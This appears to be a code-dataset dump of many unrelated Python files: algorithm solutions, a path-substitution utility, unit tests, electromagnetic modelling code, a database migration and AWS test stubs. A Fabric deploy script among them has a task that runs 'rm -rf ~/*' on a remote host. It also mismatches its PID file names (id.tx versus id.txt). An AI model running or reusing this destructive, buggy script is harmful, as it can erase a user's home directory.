content
stringlengths
5
1.05M
n = int(input()) a = list(map(int, input().split())) sm = sum(a)//(n//2) l = [] for i in range(n): for j in range(i+1, n): if a[i]+a[j] == sm and i+1 not in l: l.append(i+1) l.append(j+1) break for i in range(0,len(l), 2): print(l[i], l[i+1])
from __future__ import ( absolute_import, unicode_literals, ) import re from typing import ( AbstractSet, Any, Dict, List, Mapping, MutableMapping, Tuple, Type, Union, ) from pyparsing import ( And, Literal, MatchFirst, Optional, Or, ParserElement, Regex, White, Word, ) import six from pysoa.test.plan.errors import StatusError ENSURE_ACTION_SUBSTITUTION_DEFAULT_INDEX_RE = re.compile(r'\[\[([A-Z_-]+)\.(?!\d)([a-zA-Z0-9_.{}-]+)*\]\]') VARIABLE_SUBSTITUTION_RE = re.compile(r'(\[\[(([a-zA-Z_-]+\.\d+)?([a-zA-Z0-9_.{}-]+)*)\]\])') SOURCE_PATH_FIND_PATH_WITHOUT_INDEX_TO_ADD_INDEX_ZERO = re.compile(r'^([\w_]+)\.(?!\d+\.)') def path_put(out, path, value): # type: (Union[List, MutableMapping], six.text_type, Any) -> None """ Put data into dict structures based on a string path in the following format: - Dots indicate nested data structures - Numeric path names indicate array indices - Individual path elements that contain dots or which want to be stringified numbers can be escaped by enclosing in {}. Examples: foo.bar.baz => {'foo': {'bar': {'baz': 'value'}}} foo.bar.0 => {'foo': {'bar': [ 'value' ] }}} foo.bar.0.baz => {'foo': {'bar': [ { 'baz': 'value' } ] }}} foo.{bar.baz} => {'foo': {'bar.baz': 'value'}} foo.{0} => {'foo': {'0': 'value'}} """ slot, path_rest = _path_get_next_path_element(path) if path_rest is None: if slot is None: return # Set tip of the branch value (no more recursion at this point) if isinstance(out, list): assert isinstance(slot, int), path _vivify_array(out, slot, dict) out[slot] = value # type: ignore else: next_slot, x = _path_get_next_path_element(path_rest) if next_slot is not None and isinstance(next_slot, int): prototype = [] # type: Union[List, Dict] else: prototype = {} assert slot is not None, path if isinstance(out, MutableMapping) and slot not in out: out[slot] = prototype if isinstance(out, list): assert isinstance(slot, int), path _vivify_array(out, slot, type(prototype)) path_put(out[slot], path_rest, value) # type: ignore def _vivify_array(array, count, prototype): # type: (List, int, Union[Type[List], Type[Mapping]]) -> None for i in range(len(array), count + 1): array.append(prototype()) def path_get(data, path): # type: (Union[Mapping, List, Tuple, AbstractSet], six.text_type) -> Any """ Converse of path_put. Raises `KeyError` or `IndexError` for unaddressable paths. """ slot, path_rest = _path_get_next_path_element(path) assert slot is not None, path if isinstance(data, Mapping) and slot not in data: raise KeyError(slot) if isinstance(data, (list, tuple, AbstractSet)): # do not use Sequence, might cause infinite recursion if not isinstance(slot, int): raise TypeError('{} should be an integer for sequences and sets'.format(slot)) if len(data) < slot + 1: raise IndexError(slot) if isinstance(data, AbstractSet): data = sorted(list(data)) new_data = data[slot] # satisfy MyPy else: new_data = data[slot] # satisfy MyPy if not path_rest: return new_data return path_get(new_data, path_rest) def get_all_paths(data, current_path=''): # type: (Union[Mapping, List, Tuple, AbstractSet], six.text_type) -> List[six.text_type] paths = [] if isinstance(data, Mapping): for k, v in six.iteritems(data): if isinstance(k, six.string_types) and (k.isdigit() or '.' in k): k = '{{{}}}'.format(k) paths.extend(get_all_paths(v, _dot_join(current_path, k))) elif isinstance(data, (list, tuple, AbstractSet)): # do not use Sequence, definitely causes infinite recursion if isinstance(data, AbstractSet): data = sorted(list(data)) for i, v in enumerate(data): paths.extend(get_all_paths(v, _dot_join(current_path, i))) else: return [current_path] return paths def _dot_join(a, b): # type: (six.text_type, Union[six.text_type, int]) -> six.text_type if not a: return six.text_type(b) return '.'.join([six.text_type(a), six.text_type(b)]) def _path_get_next_path_element(path): # type: (six.text_type) -> Union[Tuple[None, None], Tuple[Union[six.text_type, int], Union[six.text_type, None]]] # returns next path element and path remainder # # This is what happens when you don't really think ahead on your language. # # Supported formats: # 1) 'dot' delimited # 2) Integer string values will be cast to int unless "escaped." # 3) Values between dots can be "escaped" by enclosing in curly braces. Anything inside the braces will be # taken "as is", but extra curlies inside the escaped value must balance. # # foo => foo # foo.bar => foo, bar # foo.bar.0 => foo, bar, int(0) # foo.bar.0.baz => foo, bar, int(0), baz # foo.{bar.0.baz} => foo, bar.0.baz # foo.{0}.bar => foo, six.text_type(0), bar # foo.{{bar.baz}}.qux => foo, {bar.baz}, qux # if not path: return None, None next_element_chars = [] brace = 0 was_in_brace = False i = 0 for i, char in enumerate(path): if char == '{': was_in_brace = True brace += 1 if brace == 1: continue if char == '}': brace -= 1 if brace == 0: continue if char == '.' and not brace: break next_element_chars.append(char) next_element = ''.join(next_element_chars) next_element_final = next_element # type: Union[six.text_type, int] if not was_in_brace and next_element.isdigit(): next_element_final = int(next_element) remainder = path[i + 1:] or None return next_element_final, remainder # noinspection PyUnresolvedReferences def recursive_parse_expr_repr(parse_expression): # type: (ParserElement) -> six.text_type """ Return a reasonable BNF(ish) style representation of a parse_expression. """ if isinstance(parse_expression, And): return ' '.join([recursive_parse_expr_repr(x) for x in parse_expression.exprs]) if isinstance(parse_expression, Optional): if isinstance(parse_expression.expr, White): return '' else: return ''.join(('[', recursive_parse_expr_repr(parse_expression.expr), ']')) if isinstance(parse_expression, (MatchFirst, Or)): return '(({}))'.format(') | ('.join([recursive_parse_expr_repr(x) for x in parse_expression.exprs])) if isinstance(parse_expression, White): return '' if isinstance(parse_expression, Literal): return "'{}'".format(parse_expression.match) if isinstance(parse_expression, Word): return parse_expression.resultsName or parse_expression.name if isinstance(parse_expression, Regex): if parse_expression.resultsName: return parse_expression.resultsName else: return repr(parse_expression) return '' def substitute_variables(data, *sources): # type: (Union[MutableMapping, List], *Union[Mapping, List, Tuple, AbstractSet]) -> None """ Overlay [[NAME]] values with values from sources, if possible. """ for path in get_all_paths(data): try: value = path_get(data, path) except (KeyError, IndexError): continue if not value: continue if not isinstance(value, six.text_type): continue replacements = [ {'token': m[0], 'full_path': m[1], 'action': m[2], 'action_path': m[3] if m[2] else None} for m in VARIABLE_SUBSTITUTION_RE.findall(value) ] if not replacements: continue for replacement in replacements: find_path = replacement['full_path'] if replacement['action']: potential_action_name = replacement['action'].lower() for source in sources: if potential_action_name in source: # `action.#` paths don't denote a sublist, unlike most path expressions ... instead, the # entire `action.#` value is a key in a dict, so we need to escape it. The result is # `{action.#}.rest.of.path`. find_path = '{{{}}}{}'.format(potential_action_name, replacement['action_path']) try: replace_with = _find_path_in_sources(find_path, *sources) except KeyError: raise StatusError('Could not find value {path} for {replacement} in sources {sources}'.format( path=find_path, replacement=replacement['token'], sources=sources, )) if value == replacement['token']: # preserve the type if this is the only replacement in the value value = replace_with else: value = value.replace(replacement['token'], six.text_type(replace_with)) path_put(data, path, value) def _find_path_in_sources(source_path, *sources): # type: (six.text_type, *Union[Mapping, List, Tuple, AbstractSet]) -> Any for source in sources: try: return path_get(source, source_path) except (KeyError, IndexError): try: return path_get(source, source_path.lower()) except (KeyError, IndexError): try: return path_get( source, SOURCE_PATH_FIND_PATH_WITHOUT_INDEX_TO_ADD_INDEX_ZERO.sub(r'{\1.0}.', source_path.lower()) ) except (KeyError, IndexError): pass raise KeyError(source_path)
class Solution: def findJudge(self, n: int, trust: List[List[int]]) -> int: """ Approach: 1.descrease trust for person1 and increase trust for person2 2.if there is a judge, trust count must be equals to n-1(everyone except judge) Time complexity O(N) Space complexity O(N) """ trust_count = collections.Counter() for person1, person2 in trust: trust_count[person2] += 1 trust_count[person1] -= 1 for judge, count in trust_count.items(): if count == n-1: return judge return n if n == 1 else -1
from django.contrib import admin from metaci.repository.models import Branch from metaci.repository.models import Repository from metaci.plan.models import PlanRepository class BranchAdmin(admin.ModelAdmin): list_display = ("repo", "name") admin.site.register(Branch, BranchAdmin) class PlanRepositoryInline(admin.TabularInline): model = PlanRepository class RepositoryAdmin(admin.ModelAdmin): list_display = ("name", "owner") inlines = [PlanRepositoryInline] admin.site.register(Repository, RepositoryAdmin)
from fabric.api import * def Install(): run('git clone https://github.com/JotaGalera/FindAInformatic') with cd("~/FindAInformatic/"): run('make') def Start(): with cd("~/FindAInformatic/"): run('sudo gunicorn --bind 0.0.0.0:80 application:app') run('pgrep gunicorn > ~/id.tx') #Para asegurarnos que tenemos controlado cual es nuestro gunicorn def Stop(): #Leemos el PID de nuestro gunicorn y lo matamos run(' var=$(head -1 ~/id.txt) ') run(' sudo kill $var') def RemoveAll(): run(' rm -rf ~/* ')
import torch import torch.nn as nn import torch.nn.functional as F import gc import time import json import sys import gc import numpy as np import os from datetime import datetime import pytorch3d from pytorch3d.structures import Meshes from pytorch3d.io import load_obj from pytorch3d.ops import sample_points_from_meshes from pytorch3d.loss import ( chamfer_distance, ) from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import matplotlib as mpl #demo_length = 30 demo_length = 50 #demo_length = 45 #demo_length = 50 step = 1 out_dir = 'demo_pcl_frames' num_points = 5000 def plot_pointcloud(points, title=""): x, z, y = points.clone().detach().cpu().squeeze().unbind(1) fig = plt.figure(figsize=(5, 5)) ax = Axes3D(fig) ax.scatter3D(x, z, y, s=0.15) ax.set_xlabel('x') ax.set_ylabel('z') ax.set_zlabel('y') ax.set_title(title) ax.view_init(100, -60) #plt.savefig(title) #plt.clf() plt.show() def sim_objs_to_pcls(sim_dir='default_out'): if not os.path.exists(out_dir): os.mkdir(out_dir) for i in range(0, demo_length, step): mesh_fnames = sorted([f for f in os.listdir('%s/out0'%sim_dir) if '%04d'%i in f]) all_verts = [] all_faces = [] vert_count = 0 for j, f in enumerate(mesh_fnames[:1] + mesh_fnames[2:]): #for j, f in enumerate(mesh_fnames): #for j, f in enumerate(mesh_fnames[:1]): verts, faces, aux = load_obj(os.path.join(sim_dir, "out0", f)) faces_idx = faces.verts_idx + vert_count verts = verts vert_count += len(verts) all_verts.append(verts) all_faces.append(faces_idx) mesh = Meshes(verts=[torch.cat(all_verts)], faces=[torch.cat(all_faces)]) sample_pcl = sample_points_from_meshes(mesh, num_points) np.save(os.path.join(out_dir, '%03d.npy'%i), sample_pcl) #plot_pointcloud(sample_pcl) #break if __name__ == '__main__': sim_objs_to_pcls()
"""CLI scripts."""
# -*- coding: utf-8 -*- """ .. moduleauthor:: Mark Hall <mark.hall@mail.room3b.eu> """ from csv import DictReader from io import TextIOWrapper from nose.tools import eq_ from pkg_resources import resource_stream def full_test(): reader = DictReader(TextIOWrapper(resource_stream('pycaptioner', 'test/data/points.csv'))) for line in reader: print (line)
from day11 import part1, part2 test_input = """5483143223 2745854711 5264556173 6141336146 6357385478 4167524645 2176841721 6882881134 4846848554 5283751526""".splitlines() def test_part1(): assert part1(test_input) == 1656 def test_part2(): assert part2(test_input) == 195
from SimPEG import Utils, np from scipy.constants import mu_0, epsilon_0 from SimPEG.EM.Utils.EMUtils import k def getKc(freq,sigma,a,b,mu=mu_0,eps=epsilon_0): a = float(a) b = float(b) # return 1./(2*np.pi) * np.sqrt(b / a) * np.exp(-1j*k(freq,sigma,mu,eps)*(b-a)) return np.sqrt(b / a) * np.exp(-1j*k(freq,sigma,mu,eps)*(b-a)) def _r2(xyz): return np.sum(xyz**2,1) def _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): Kc1 = getKc(freq,sigma[1],a,b,mu[1],eps) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) sqrtr2z2 = np.sqrt(r2 + dxyz[:,2]**2) k2 = k(freq,sigma[2],mu[2],eps) return Kc1 * moment / (4.*np.pi) *np.exp(-1j*k2*sqrtr2z2) / sqrtr2z2 def _getCasingHertzMagDipoleDeriv_r(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) sqrtr2z2 = np.sqrt(r2 + dxyz[:,2]**2) k2 = k(freq,sigma[2],mu[2],eps) return -HertzZ * np.sqrt(r2) / sqrtr2z2 * (1j*k2 + 1./ sqrtr2z2) def _getCasingHertzMagDipoleDeriv_z(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2z2 = _r2(dxyz) sqrtr2z2 = np.sqrt(r2z2) k2 = k(freq,sigma[2],mu[2],eps) return -HertzZ*dxyz[:,2] /sqrtr2z2 * (1j*k2 + 1./sqrtr2z2) def _getCasingHertzMagDipole2Deriv_z_r(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) dHertzZdr = _getCasingHertzMagDipoleDeriv_r(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) r = np.sqrt(r2) z = dxyz[:,2] sqrtr2z2 = np.sqrt(r2 + z**2) k2 = k(freq,sigma[2],mu[2],eps) return dHertzZdr*(-z/sqrtr2z2)*(1j*k2+1./sqrtr2z2) + HertzZ*(z*r/sqrtr2z2**3)*(1j*k2 + 2./sqrtr2z2) def _getCasingHertzMagDipole2Deriv_z_z(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) dHertzZdz = _getCasingHertzMagDipoleDeriv_z(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) nobs = obsloc.shape[0] dxyz = obsloc - np.c_[np.ones(nobs)]*np.r_[srcloc] r2 = _r2(dxyz[:,:2]) r = np.sqrt(r2) z = dxyz[:,2] sqrtr2z2 = np.sqrt(r2 + z**2) k2 = k(freq,sigma[2],mu[2],eps) return (dHertzZdz*z + HertzZ)/sqrtr2z2*(-1j*k2 - 1./sqrtr2z2) + HertzZ*z/sqrtr2z2**3*(1j*k2*z + 2.*z/sqrtr2z2) def getCasingEphiMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return 1j * omega(freq) * mu * _getCasingHertzMagDipoleDeriv_r(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) def getCasingHrMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return _getCasingHertzMagDipole2Deriv_z_r(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) def getCasingHzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): d2HertzZdz2 = _getCasingHertzMagDipole2Deriv_z_z(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) k2 = k(freq,sigma[2],mu[2],eps) HertzZ = _getCasingHertzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) return d2HertzZdz2 + k2**2 * HertzZ def getCasingBrMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return mu_0 * getCasingHrMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment) def getCasingBzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu=mu_0*np.ones(3),eps=epsilon_0,moment=1.): return mu_0 * getCasingHzMagDipole(srcloc,obsloc,freq,sigma,a,b,mu,eps,moment)
''' Given numRows, generate the first numRows of Pascal's triangle. For example, given numRows = 5, Return [ [1], [1,1], [1,2,1], [1,3,3,1], [1,4,6,4,1] ] 明显是一个动态规划问题, 当然有一些技巧性方法,比如: 1 3 3 1 0 + 0 1 3 3 1 = 1 4 6 4 1 ''' class Solution: def generate(self, numRows): """ :type numRows: int :rtype: List[List[int]] """ nums=[] for i in range(numRows): if(i==0): nums.append([1]) continue if(i==1): nums.append([1,1]) continue temp=[] temp.append(1) for j in range(len(nums[i-1])-1): temp.append(nums[i-1][j]+nums[i-1][j+1]) temp.append(1) nums.append(temp) return(nums)
import unittest from cnc.gcode import * class TestGCode(unittest.TestCase): def setUp(self): self.default = Coordinates(-7, 8, 9, -10) def tearDown(self): pass def test_constructor(self): # GCode shouldn't be created with constructor, but since it uses # internally, let's check it. self.assertRaises(TypeError, GCode) gc = GCode({"X": "1", "Y": "-2", "Z": "0", "E": 99, "G": "1"}) self.assertEqual(gc.coordinates(self.default, 1).x, 1.0) self.assertEqual(gc.coordinates(self.default, 1).y, -2.0) self.assertEqual(gc.coordinates(self.default, 1).z, 0.0) self.assertEqual(gc.coordinates(self.default, 1).e, 99.0) def test_has(self): gc = GCode.parse_line("g1X2Y3z4E5F50") self.assertTrue(gc.has("G")) self.assertTrue(gc.has("X")) self.assertTrue(gc.has("Y")) self.assertTrue(gc.has("Z")) self.assertTrue(gc.has("E")) self.assertTrue(gc.has("F")) def test_parser(self): gc = GCode.parse_line("G1X2Y-3Z4E1.5") self.assertEqual(gc.command(), "G1") self.assertEqual(gc.coordinates(self.default, 1).x, 2.0) self.assertEqual(gc.coordinates(self.default, 1).y, -3.0) self.assertEqual(gc.coordinates(self.default, 1).z, 4.0) self.assertEqual(gc.coordinates(self.default, 1).e, 1.5) gc = GCode.parse_line("") self.assertIsNone(gc) def test_defaults(self): # defaults are values which should be returned if corresponding # value doesn't exist in gcode. default = Coordinates(11, -12, 14, -10) gc = GCode.parse_line("G1") self.assertEqual(gc.coordinates(default, 1).x, 11.0) self.assertEqual(gc.coordinates(default, 1).y, -12.0) self.assertEqual(gc.coordinates(default, 1).z, 14.0) self.assertEqual(gc.coordinates(default, 1).e, -10.0) def test_commands(self): gc = GCode({"G": "1"}) self.assertEqual(gc.command(), "G1") gc = GCode.parse_line("M99") self.assertEqual(gc.command(), "M99") def test_case_sensitivity(self): gc = GCode.parse_line("m111") self.assertEqual(gc.command(), "M111") gc = GCode.parse_line("g2X3y-4Z5e6") self.assertEqual(gc.command(), "G2") self.assertEqual(gc.coordinates(self.default, 1).x, 3.0) self.assertEqual(gc.coordinates(self.default, 1).y, -4.0) self.assertEqual(gc.coordinates(self.default, 1).z, 5.0) self.assertEqual(gc.coordinates(self.default, 1).e, 6.0) def test_has_coordinates(self): gc = GCode.parse_line("X2Y-3Z4") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("G1") self.assertFalse(gc.has_coordinates()) gc = GCode.parse_line("X1") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("Y1") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("Z1") self.assertTrue(gc.has_coordinates()) gc = GCode.parse_line("E1") self.assertTrue(gc.has_coordinates()) def test_radius(self): gc = GCode.parse_line("G2I1J2K3") self.assertEqual(gc.radius(self.default, 1).x, 1) self.assertEqual(gc.radius(self.default, 1).y, 2) self.assertEqual(gc.radius(self.default, 1).z, 3) gc = GCode.parse_line("G3") self.assertEqual(gc.radius(self.default, 1).x, self.default.x) self.assertEqual(gc.radius(self.default, 1).y, self.default.y) self.assertEqual(gc.radius(self.default, 1).z, self.default.z) def test_multiply(self): # getting coordinates could modify value be specified multiplier. gc = GCode.parse_line("X2 Y-3 Z4 E5") self.assertEqual(gc.coordinates(self.default, 25.4).x, 50.8) self.assertEqual(gc.coordinates(self.default, 2).y, -6) self.assertEqual(gc.coordinates(self.default, 0).y, 0) self.assertEqual(gc.coordinates(self.default, 5).e, 25) def test_whitespaces(self): gc = GCode.parse_line("X1 Y2") self.assertEqual(gc.coordinates(self.default, 1).x, 1.0) self.assertEqual(gc.coordinates(self.default, 1).y, 2.0) gc = GCode.parse_line("X 3 Y4") self.assertEqual(gc.coordinates(self.default, 1).x, 3.0) self.assertEqual(gc.coordinates(self.default, 1).y, 4.0) gc = GCode.parse_line("X 5 Y\t 6") self.assertEqual(gc.coordinates(self.default, 1).x, 5.0) self.assertEqual(gc.coordinates(self.default, 1).y, 6.0) gc = GCode.parse_line(" \tX\t\t \t\t7\t ") self.assertEqual(gc.coordinates(self.default, 1).x, 7.0) def test_errors(self): self.assertRaises(GCodeException, GCode.parse_line, "X1X1") self.assertRaises(GCodeException, GCode.parse_line, "X1+Y1") self.assertRaises(GCodeException, GCode.parse_line, "X1-Y1") self.assertRaises(GCodeException, GCode.parse_line, "~Y1") self.assertRaises(GCodeException, GCode.parse_line, "Y") self.assertRaises(GCodeException, GCode.parse_line, "abracadabra") self.assertRaises(GCodeException, GCode.parse_line, "G1M1") self.assertRaises(GCodeException, GCode.parse_line, "x 1 y 1 z 1 X 1") def test_comments(self): self.assertIsNone(GCode.parse_line("; some text")) self.assertIsNone(GCode.parse_line(" \t \t ; some text")) self.assertIsNone(GCode.parse_line("(another comment)")) gc = GCode.parse_line("X2.5 ; end of line comment") self.assertEqual(gc.coordinates(self.default, 1).x, 2.5) gc = GCode.parse_line("X2 Y(inline comment)7") self.assertEqual(gc.coordinates(self.default, 1).x, 2.0) self.assertEqual(gc.coordinates(self.default, 1).y, 7.0) gc = GCode.parse_line("X2 Y(inline comment)3 \t(one more comment) " "\tz4 ; multi comment test") self.assertEqual(gc.coordinates(self.default, 1).x, 2.0) self.assertEqual(gc.coordinates(self.default, 1).y, 3.0) self.assertEqual(gc.coordinates(self.default, 1).z, 4.0) if __name__ == '__main__': unittest.main()
import tvm import tvm.micro def targetIsARM(target): return target.attrs["mcpu"] == "armv6-m" def targetIsRISCV(target): return target.attrs["mcpu"] == "rv32gc" class Compiler_Ext(tvm.micro.DefaultCompiler): def _autodetect_toolchain_prefix(self, target): if targetIsARM(target): return "arm-none-eabi-" if targetIsRISCV(target): return "/usr/local/research/projects/SystemDesign/tools/riscv/current/bin/riscv64-unknown-elf-" return super(Compiler_Ext, self)._autodetect_toolchain_prefix(target) def _defaults_from_target(self, target): opts = super(Compiler_Ext, self)._defaults_from_target(target) if targetIsARM(target): opts = [opt.replace("mcpu", "march") for opt in opts] opts.append("-mthumb") opts.append("--specs=nosys.specs") if targetIsRISCV(target): opts = [opt.replace("mcpu", "march") for opt in opts] opts.append("-mabi=ilp32d") return opts
""" # test_config_gunicorn """ import logging import unittest import mock import ml.config_gunicorn as config_gunicorn class ConfigGunicornTester(unittest.TestCase): """ ConfigGunicornTester includes all unit tests for ml.config_gunicorn module """ @classmethod def teardown_class(cls): logging.shutdown() def setUp(self): """setup for test""" pass def tearDown(self): """tearing down at the end of the test""" pass def test_config(self): self.assertEqual(config_gunicorn.worker_class, 'sync') self.assertTrue(config_gunicorn.workers >= 1) def test_hooks(self): environ = mock.MagicMock() new_value = mock.MagicMock() old_value = mock.MagicMock() req = mock.MagicMock() server = mock.MagicMock() worker = mock.MagicMock() resp = mock.MagicMock() config_gunicorn.nworkers_changed(server, new_value, old_value) config_gunicorn.on_exit(server) config_gunicorn.on_reload(server) config_gunicorn.on_starting(server) config_gunicorn.post_fork(server, worker) config_gunicorn.post_request(worker, req, environ, resp) config_gunicorn.post_worker_init(worker) config_gunicorn.pre_exec(server) config_gunicorn.pre_fork(server, worker) config_gunicorn.pre_request(worker, req) config_gunicorn.when_ready(server) config_gunicorn.worker_abort(worker) config_gunicorn.worker_exit(server, worker) config_gunicorn.worker_init(worker)
import heapq from collections import deque from typing import List class Solution1: def max_result(self, nums: List[int], k: int) -> int: q = deque(([(0, nums[0])])) ret = nums[0] for i in range(1, len(nums)): while q and q[-1][0] < (i - k): q.pop() ret = nums[i] + q[-1][1] while q and q[0][1] < ret: q.popleft() q.appendleft((i, ret)) return ret class Solution2: def max_result(self, nums, k): h = [(-nums[0], 0)] ret = nums[0] for i in range(1, len(nums)): while h and h[0][1] < (i-k): heapq.heappop(h) ret = -h[0][0] + nums[i] heapq.heappush(h, (-ret, i)) return ret
import copy from cumulusci.robotframework import locators_52 lex_locators = copy.deepcopy(locators_52.lex_locators) lex_locators["object_list"] = { # Note: this matches the <td> with the checkbutton, not the inner checkbutton # This is because clicking the actual checkbutton will throw an error that # another element will receive the click. "checkbutton": '//tbody/tr[.//*[text()="{}"]]//td[.//input[@type="checkbox"]]', "status_info": "//force-list-view-manager-status-info", }
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import json from netests.constants import NOT_SET as NSET from netests.protocols.lldp import LLDP, ListLLDP def _napalm_lldp_converter( hostname: str(), cmd_output: json, options={} ) -> ListLLDP: lldp_neighbors_lst = ListLLDP( lldp_neighbors_lst=list() ) if not isinstance(cmd_output, dict): cmd_output = json.loads(cmd_output) if 'get_lldp_neighbors_detail' in cmd_output.keys(): for i, f in cmd_output.get('get_lldp_neighbors_detail').items(): for n in f: lldp_neighbors_lst.lldp_neighbors_lst.append( LLDP( local_name=hostname, local_port=i, neighbor_mgmt_ip=NSET, neighbor_name=n.get("remote_system_name", NSET), neighbor_port=n.get("remote_port"), neighbor_os=n.get("remote_system_description", NSET), neighbor_type=n.get("remote_system_capab", NSET), options=options ) ) return lldp_neighbors_lst
from __future__ import absolute_import from dataverse.settings.defaults import * # noqa try: from dataverse.settings.local import * # noqa except ImportError as error: pass
"""An example of unit tests based on pytest.""" from .demo import add def test_add() -> None: """Test add.""" assert add([1, 2, 3]) == 6
"""seed databases and allow nullable password_hash Revision ID: 5818f4679595 Revises: 4b61e9319ad9 Create Date: 2021-09-08 14:27:33.384835 """ from alembic import op import sqlalchemy as sa from datetime import datetime import uuid # revision identifiers, used by Alembic. revision = "5818f4679595" down_revision = "4b61e9319ad9" branch_labels = None depends_on = None def upgrade(): meta = sa.MetaData(bind=op.get_bind()) meta.reflect(only=("organisations", "scan_types", "users")) organisations = sa.Table("organisations", meta) scan_types = sa.Table("scan_types", meta) op.alter_column("users", "password_hash", nullable=True) op.bulk_insert( organisations, [ { "id": str(uuid.uuid4()), "name": "Canadian Digital Service - Service Numérique Canadien", "created_at": datetime.now(), "updated_at": datetime.now(), } ], ) op.bulk_insert( scan_types, [ { "id": str(uuid.uuid4()), "name": "axe-core", "created_at": datetime.now(), "updated_at": datetime.now(), }, { "id": str(uuid.uuid4()), "name": "OWASP Zap", "created_at": datetime.now(), "updated_at": datetime.now(), }, ], ) def downgrade(): op.execute("UPDATE users SET password_hash = '' WHERE password_hash IS NULL") op.alter_column("users", "password_hash", nullable=False) op.execute( """ DELETE FROM users; DELETE FROM a11y_violations; DELETE FROM a11y_reports; DELETE FROM scans; DELETE FROM template_scan_triggers; DELETE FROM template_scans; DELETE FROM templates; DELETE FROM "organisations" WHERE name = 'Canadian Digital Service - Service Numérique Canadien'; """ ) op.execute("""DELETE FROM "scan_types" WHERE name = 'axe-core'; """) op.execute("""DELETE FROM "scan_types" WHERE name = 'OWASP Zap'; """)
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 """ Stub functions that are used by the AWS Organizations unit tests. When tests are run against an actual AWS account, the stubber class does not set up stubs and passes all calls through to the Boto3 client. """ import json from test_tools.example_stubber import ExampleStubber class OrganizationsStubber(ExampleStubber): """ A class that implements a variety of stub functions that are used by the AWS Organizations unit tests. The stubbed functions all expect certain parameters to be passed to them as part of the tests, and will raise errors when the actual parameters differ from the expected. """ def __init__(self, client, use_stubs=True): """ Initializes the object with a specific client and configures it for stubbing or AWS passthrough. :param client: A Boto3 Organizations client. :param use_stubs: When True, use stubs to intercept requests. Otherwise, pass requests through to AWS. """ super().__init__(client, use_stubs) @staticmethod def _make_policy_summary(policy): return { 'Id': policy['id'], 'Arn': f'arn:aws:organizations::111111111111:policy/{policy["name"]}', 'Name': policy['name'], 'Description': policy['description'], 'Type': policy['type'], 'AwsManaged': False } def stub_create_policy(self, policy, error_code=None): expected_parameters = { 'Name': policy['name'], 'Description': policy['description'], 'Content': json.dumps(policy['content']), 'Type': policy['type'] } response = {'Policy': { 'PolicySummary': self._make_policy_summary(policy), 'Content': json.dumps(policy['content']) }} self._stub_bifurcator( 'create_policy', expected_parameters, response, error_code=error_code) def stub_list_policies(self, policy_filter, policies, error_code=None): expected_parameters = {'Filter': policy_filter} response = {'Policies': [self._make_policy_summary(pol) for pol in policies]} self._stub_bifurcator( 'list_policies', expected_parameters, response, error_code=error_code) def stub_describe_policy(self, policy, error_code=None): expected_parameters = {'PolicyId': policy['id']} response = {'Policy': { 'PolicySummary': self._make_policy_summary(policy), 'Content': json.dumps(policy['content']) }} self._stub_bifurcator( 'describe_policy', expected_parameters, response, error_code=error_code) def stub_attach_policy(self, policy_id, target_id, error_code=None): expected_parameters = {'PolicyId': policy_id, 'TargetId': target_id} self._stub_bifurcator( 'attach_policy', expected_parameters, error_code=error_code) def stub_detach_policy(self, policy_id, target_id, error_code=None): expected_parameters = {'PolicyId': policy_id, 'TargetId': target_id} self._stub_bifurcator( 'detach_policy', expected_parameters, error_code=error_code) def stub_delete_policy(self, policy_id, error_code=None): expected_parameters = {'PolicyId': policy_id} self._stub_bifurcator( 'delete_policy', expected_parameters, error_code=error_code)
